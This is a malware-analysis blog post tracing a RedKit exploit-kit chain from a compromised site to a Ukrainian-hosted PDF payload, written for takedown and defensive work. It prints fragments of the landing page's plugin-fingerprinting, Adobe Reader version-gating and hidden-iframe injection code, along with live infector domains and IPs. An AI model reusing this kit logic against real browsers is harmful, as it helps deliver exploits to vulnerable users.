The difference between my previous analysis and this one is that this one was purely analyzed & written from a "weaponized" OS X with my bunch of FreeBSD tools recompiled on it.
I hope this write-up can be used as a how-to by my friends who use the same OS X environment too. So for Mac users, especially those of you who are familiar with UNIX/Linux command lines, don't be in a hurry to switch to another "X" OS for analysis; in my test-drive while writing this post, it proved that OS X is more than enough to do a deep analysis of any threat.
OK, here we go!
It all begins with the infected site at the url below:
During the access to the site I recorded the connection below with the X11-based Wireshark:
If we follow the stream of one HTTP response, it will show the request for infection below:
We saw 4 or 5 redirections in a row when accessing the infector site above. So I grabbed "anti-aging-c-35.html?p___=" to see whether the redirecting IFRAME code was there, as per the TextMate snippet below:
Why would a single HTML page cause 4 or 5 redirections? There must be more.. I searched the components included to view this site with the search tools below:
Then I opened my Firefox, faking the request to fool the RedKit script and to get the other files used as components of this HTML, and found the same IFRAME method injected, as searched in my F*bug:
In detail, I went to those scripts containing the iframe to confirm, as per the row of snapshots below:
Seeing these, I realized that this site is (STILL) actively being used to infect.
I further checked whether the infector site's domain is legit or not:
    Registered through: GoDaddy.com, LLC (http: //www.godaddy.com)
    Domain Name: TEVASKINCARE.COM
    Created on: 01-Mar-10
    Expires on: 25-Jul-13
    Last Updated on: 26-Jul-12
    Registrant:
    Teva Skin Science LLC
    117 Lost Forest Drive
    Westminster, SC 29693
    United States

    NetRange:   173.201.0.0 - 173.201.255.255
    CIDR:       173.201.0.0/16
    OriginAS:   AS26496
    NetName:    GO-DADDY-COM-LLC

    --2013-04-14 18:06:15--  h00p: //www.tevaskincare.com/anti-aging-c-35.html?p___=
    Resolving www.tevaskincare.com... 173.201.140.74
    Caching www.tevaskincare.com => 173.201.140.74
    Connecting to www.tevaskincare.com|173.201.140.74|:80... connected.
    GET /anti-aging-c-35.html?p___= HTTP/1.1
    Referer: Whatever that has google in it..
    User-Agent: MalwareMustDie was banging your site to check RedKit infector..
    Host: www.tevaskincare.com
    HTTP request sent, awaiting response...
    HTTP/1.1 200 OK
    Date: Sun, 14 Apr 2013 09:06:17 GMT
    Server: Apache
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Content-Encoding: gzip
    Vary: Accept-Encoding
    Set-Cookie: osCsid=svle39em7ni3oj6982rjaossm2; path=/
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html
    200 OK
    Length: unspecified [text/html]
    Saving to: ‘anti-aging-c-35.html?p___=’
    2013-04-14 18:06:20 (495 KB/s) - ‘anti-aging-c-35.html?p___=’ saved [6403]

Don't trust the GUI result that much? Me neither. So I reproduced the access:
    --2013-04-14 18:11:03--  h00p: //r-yonemura.jp/eagn.html?i=830988
    Resolving r-yonemura.jp... 211.13.204.46
    Caching r-yonemura.jp => 211.13.204.46
    Connecting to r-yonemura.jp|211.13.204.46|:80... connected.
    GET /eagn.html?i=830988 HTTP/1.1
    Referer: h00p: //www.tevaskincare.com/anti-aging-c-35.html?p___=
    User-Agent: Beware malware.. MalwareMustDie is getting closer.. with new toyz..
    Host: r-yonemura.jp
    HTTP request sent, awaiting response...
    HTTP/1.1 200 OK
    Date: Sun, 14 Apr 2013 09:11:04 GMT
    Server: Apache
    X-Powered-By: PHP/5.2.14
    Content-Length: 0
    Keep-Alive: timeout=2, max=100
    Connection: Keep-Alive
    Content-Type: text/html
    200 OK
    Length: 0 [text/html]
    Saving to: ‘eagn.html?i=830988’
    2013-04-14 18:11:07 (0.00 B/s) - ‘eagn.html?i=830988’ saved [0/0]
So always remember rule number one: never do too much "HTTP-banging" when dealing with RedKit infectors :-)
Anyhow, let's study the site used for the second infector:
    [Domain Name]   R-YONEMURA.JP
    [Name Server]   ns.namedserver.net
    [Name Server]   ns2.namedserver.net
    [登録年月日]    2009/12/03
    [有効期限]      2013/12/31
    [状態]          Active
    [最終更新]      2013/01/01 01:05:09 (JST)
    [名前]          株式会社リンクアップ
    [Name]          link up inc

    inetnum:   211.13.200.0 - 211.13.204.255
    netname:   ISLE-NET
    descr:     Isle,inc.
    country:   JP
    admin-c:   MA117JP
Fortunately, this is an infector I always keep an eye on, so I had already logged the "good response" as documentation; it contains the landing page, which can be used as PoC, pasted here -->>[HERE]
Now let's see the suspicious data in that landing page.. hoping to see the interesting url for the exploit infector, or maybe a payload?
A Snip of Exploit Kit Landing Page
The plugin detection used...
    var Ganni = {
        version: "0.7.7",
        rDate: "04/11/2012",
        name: "Ganni",
        handler: function (c, b, a) {
            return function () {
                c(b, a)
            }
As it is, the OS detection..
    c.OS = 100;
    if (b) {
        var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\s*PC", 22.3, "", 100];
        for (f = d.length - 2; f >= 0; f = f - 2) {
            if (d[f] && new RegExp(d[f], "i").test(b)) {
                c.OS = d[f + 1];
                break
                [...]
Interesting "status" flag being set after detecting Java:
    if (c.isIE && !c.ActiveXEnabled && d !== "java") {
        a.status = -2;
        return a
    }
    a.status = 1;
    [...]

    Plugins: {
        adobereader: {
            mimeType: "application/pdf",
            navPluginObj: null,
            progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
            classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
            INSTALLED: {},
            [...]

    flopp = Ganni.getVersion("AdobeReader");
    if (flopp) {
        flopp = flopp.split(',');
        sp1 = false;
        if (flopp[1] < 4 && 9 == flopp[0]) sp1 = true;
        if (flopp[1] < 3 && flopp[0] == 8) sp1 = true;
        if (sp1) {
            bosfef.setAttribute("width", 31);
            bosfef.setAttribute("height", 13);

    insertHTML: function (g, b, h, a, l) {
        var m, n = document, k = this, q, p = n.createElement("span"), o, j, f = "<";
        var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
        var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
        if (!k.isDefined(a)) {
            a = ""
        }
        if (k.isString(g) && (/[^\s]/).test(g)) {
            g = g.toLowerCase().replace(/\s/g, "");
            q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
            q += 'style="' + i + 'display:inline;" ';
            for (o = 0; o < b.length; o = o + 2) {
                if (/[^\s]/.test(b[o + 1])) {
                    q += b[o] + '="' + b[o + 1] + '" '
                }
            }
            q += ">";
            for (o = 0; o < h.length; o = o + 2) {
                if (/[^\s]/.test(h[o + 1])) {
                    q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
                }
            }
            q += a + f + "/" + g + ">"
        } else {
            q = a
        }
        [...]

    var bosfef = document.createElement("iframe");
    function dettq() {
        document.body.appendChild(bosfef);
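To make the client-profiling logic above concrete, here is an added Python re-implementation (not code from the landing page or from MalwareMustDie) of the reversed-table OS detection and of the Adobe Reader version gate; the User-Agent strings used to exercise it are constructed. It shows why the table is walked from the end, and which Reader versions fall inside the gate (9.0-9.3 and 8.0-8.2), so a defender can tell whether a given client would have received the PDF iframe.

```python
import re

# Table reconstructed from the landing page's (renamed) PluginDetect snippet:
# [pattern, code, pattern, code, ...]. The kit walks it from the END, so the
# specific entries ("iPhone", "Win.*CE") are tried before the generic "Mac"/"Win".
OS_TABLE = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4,
            "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3,
            "Win.*CE", 22.1, "Win.*Mobile", 22.2, r"Pocket\s*PC", 22.3,
            "", 100]


def detect_os(user_agent):
    """Return the kit's OS code for a User-Agent string (100 = unknown/none)."""
    if not user_agent:
        return 100
    for i in range(len(OS_TABLE) - 2, -1, -2):
        pattern = OS_TABLE[i]
        # the empty pattern is falsy and skipped, exactly as `d[f] &&` does in JS
        if pattern and re.search(pattern, user_agent, re.IGNORECASE):
            return OS_TABLE[i + 1]
    return 100


def reader_targeted(version):
    """Mirror the sp1 gate on a PluginDetect version string such as "9,3,0,0".

    JS compares the string fields numerically (flopp[1] < 4, 9 == flopp[0]),
    so the fields are converted to int here; anything non-numeric is not targeted.
    """
    parts = version.split(",")
    if len(parts) < 2:
        return False
    try:
        major, minor = int(parts[0]), int(parts[1])
    except ValueError:
        return False
    return (major == 9 and minor < 4) or (major == 8 and minor < 3)


def profile(user_agent, reader_version):
    """What the landing page learns about a visitor before deciding on the PDF iframe."""
    return {"os": detect_os(user_agent), "pdf_iframe": reader_targeted(reader_version)}
```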
The file is currently unavailable (smile), or did tango move faster?
    GET /987.pdf HTTP/1.1
    Host: marykay-duka.kharkov.ua (91.206.200.199)
    HTTP request sent, awaiting response...
    HTTP/1.1 404 Not Found
    Server: nginx/1.1.10
    Date: Sun, 14 Apr 2013 13:12:13 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 205
    Connection: keep-alive
    404 Not Found
    The requested URL /987.pdf was not found on this server
    ] done.
    2013-04-14 22:12:15 ERROR 404: Not Found.
What's with 91.206.200.199?
This is the main course of this story, actually. As we can see, marykay-duka.kharkov.ua is a domain served by a Ukrainian hosting service. The IP is officially owned by this host, with the reverse DNS registered as:
    web17.ukraine.com.ua A 91.206.200.199

    inetnum:        91.206.200.0 - 91.206.201.255
    netname:        Hosting
    descr:          Delta-X LTD
    org:            ORG-LA230-RIPE
    country:        UA
    admin-c:        RIV3-RIPE
    tech-c:         RIV3-RIPE
    status:         ASSIGNED PI
    mnt-by:         RIPE-NCC-END-MNT
    mnt-by:         DELTAXUA-MNT

    organisation:   ORG-LA230-RIPE
    org-name:       "DELTA-X" LTD
    org-type:       OTHER
    address:        Ukriane, Kyiv
    address:        Bogdana Khmelnitskogo 16/22, r. 504/1
    abuse-mailbox:  abuse@delta-x.ua
    admin-c:        RIV3-RIPE

    person:         Rudenko Ilya Vladimirovich
    address:        UA, Kyiv, 03065
    address:        PO Box 65
    phone:          +38(044)392-74-33
    abuse-mailbox:  abuse@delta-x.ua

"Some PoC of infections in this hosting server's IP.. urlquery ALSO detected other action in some of the domains under this IP..."
    url: http: //urlquery.net/search.php?q=91.206.200.199&type=string&start=2013-01-14&end=2013-04-14&max=50
    Date (CET)   Alerts / IDS   URL   IP
"And so does VirusTotal.."
    url: https: //www.virustotal.com/en/ip-address/91.206.200.199/information/
    2/36   2013-04-11 11:23:26   "h00p://chevrole.org.ua/"

Thus, the pDNS command line combined with the domain checker script we posted in our Google Project can extract more domains used by the malware infector, together with their current ALIVE status:
"..while these are domains via the UKRAINE.COM.UA registrar - with NS, a PoC of hosting (provided set of domains + DNS)"
[...] etc [...]
"AND these domains are pointed to an IP address w/o proper NS sets.."
I didn't say that the 44 domains registered on this IP are all verdicted bad, but some dangerous infectors with RedKit and other Exploit Kits are found ending up at this IP.
( This is the list of active domains in 91.206.200.199 -->>[PASTEBIN] )
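As an added Python sketch of the triage step described above (not the checker script from our Google Project), this parses the domain,IP,NS rows in the layout the pDNS/checker output uses, keeps only the domains on the watched IP, flags the ones with no proper NS set, and re-resolves each to confirm it is still ALIVE. The rows and domain names are constructed placeholders, and the resolver is injectable so the check runs offline.

```python
import ipaddress
import socket

WATCHED_IP = "91.206.200.199"   # the hosting IP this post keeps an eye on

# Constructed sample rows in the "domain,ip[,ip...][,NS...]" layout the checker
# script emits; the domain names are placeholders, not the ones from the post.
SAMPLE_ROWS = """\
shop-one.example,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
forum.two.example,91.206.200.43,91.206.200.199,
three.example,91.206.200.199,
four.example,91.206.200.210,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA
"""


def parse_rows(text):
    """Split each row into (domain, [ips], [nameservers]); fields are classified
    by parsing, since a domain may list several A records before its NS set."""
    records = []
    for line in text.splitlines():
        fields = [f.strip() for f in line.split(",")]
        if not fields[0]:
            continue
        ips, nameservers = [], []
        for field in filter(None, fields[1:]):   # empty trailing field = no NS
            try:
                ipaddress.ip_address(field)
                ips.append(field)
            except ValueError:
                nameservers.append(field)
        records.append((fields[0], ips, nameservers))
    return records


def triage(text, watched_ip=WATCHED_IP, resolve=socket.gethostbyname):
    """Keep domains on the watched IP, flag missing NS, re-resolve for ALIVE status.
    `resolve` is injectable so the check can run offline against a fake resolver."""
    results = []
    for domain, ips, nameservers in parse_rows(text):
        if watched_ip not in ips:
            continue
        try:
            alive = resolve(domain) == watched_ip
        except OSError:
            alive = False   # NXDOMAIN / timeout: no longer pointed at this IP
        results.append({"domain": domain, "ips": ips,
                        "has_ns": bool(nameservers), "alive": alive})
    return results
```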
Furthermore, the domain used for infection in our case belongs to the info below:
    domain:     marykay-duka.kharkov.ua
    descr:      Domain registered for customer of Ukraine.com.ua
    admin-c:    DELTA-EUNIC
    tech-c:     DELTA-EUNIC
    nserver:    ns1.ukraine.com.ua
    nserver:    ns2.ukraine.com.ua
    nserver:    ns3.ukraine.com.ua
    mnt-by:     DELTA-MNT-EUNIC
    reg-by:     DELTA-REG-EUNIC
    changed:    hostmaster@deltahosting.com.ua 20130308
    source:     EUNIC
    Transfer: locked
    Record created: 2011-03-11
    Record last updated: 2013-03-08
    Record registered: 2011-03-11
    Record expires: 2014-03-11
    Status: OK
The bottom line is, in the meantime please keep an eye on any suspicious access which leads to 91.206.200.199. And all of the network analysis was conducted via OS X Terminal :-)

References
The numbers below link to the infection references that can be used for our infector dismantling (TangoDown) purpose:
#MalwareMustDie